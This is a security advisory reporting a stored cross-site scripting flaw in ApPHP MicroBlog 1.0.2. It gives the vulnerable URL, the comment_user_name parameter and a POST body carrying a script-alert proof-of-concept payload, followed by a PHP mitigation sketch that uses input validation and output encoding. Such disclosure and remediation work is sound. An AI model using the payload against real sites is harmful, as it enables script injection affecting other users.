ApPHP MicroBlog 1.0.2 Cross Site Scripting

2016.10.13
Credit: Besim
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162

Description :

Vulnerable link : http://site_name/path/index.php?page=posts&post_id=

Stored XSS Payload ( Comments ): *

# Vulnerable URL : http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name

############ POST DATA ############

task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish your comment

############ ######################
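
Mitigation sketch for the comment_user_name field reported above, as an added example that is not ApPHP MicroBlog's own code: it validates the name on input and HTML-encodes every stored field on output. The function names, the array layout and the name policy (1 to 50 letters, digits, spaces and a few punctuation marks) are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helper names, not ApPHP MicroBlog's own code.

/** Escape a stored value for an HTML text or quoted-attribute context. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Input-side check for the comment author name: 1 to 50 characters from an
 * allow-list of letters, digits, space and a few punctuation marks.
 * Returns null when the name should be rejected. (The policy is an assumption.)
 */
function validateCommentUserName(string $raw): ?string
{
    $name = trim($raw);
    // With /u, invalid UTF-8 makes preg_match() return false, which is rejected too.
    return preg_match('/^[\p{L}\p{N} ._\'-]{1,50}$/u', $name) === 1 ? $name : null;
}

/** Render one stored comment; every dynamic field is encoded at output time. */
function renderComment(array $row): string
{
    return '<div class="comment"><b>' . e($row['comment_user_name']) . '</b>'
         . '<p>' . nl2br(e($row['comment_text'])) . '</p></div>';
}

// Constructed sample: the field values taken from the advisory's POST data.
$row = [
    'comment_user_name' => '<script>alert(7);</script>',
    'comment_text'      => 'Besim',
];

// Input validation rejects the name before it would be stored.
var_dump(validateCommentUserName($row['comment_user_name']));

// Output encoding renders the value as inert text even if it is already stored.
echo renderComment($row), PHP_EOL;
```

Output encoding is the control that matters for rows already in the database; the input check only reduces what gets stored from now on.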



Copyright 2024, cxsecurity.com

 
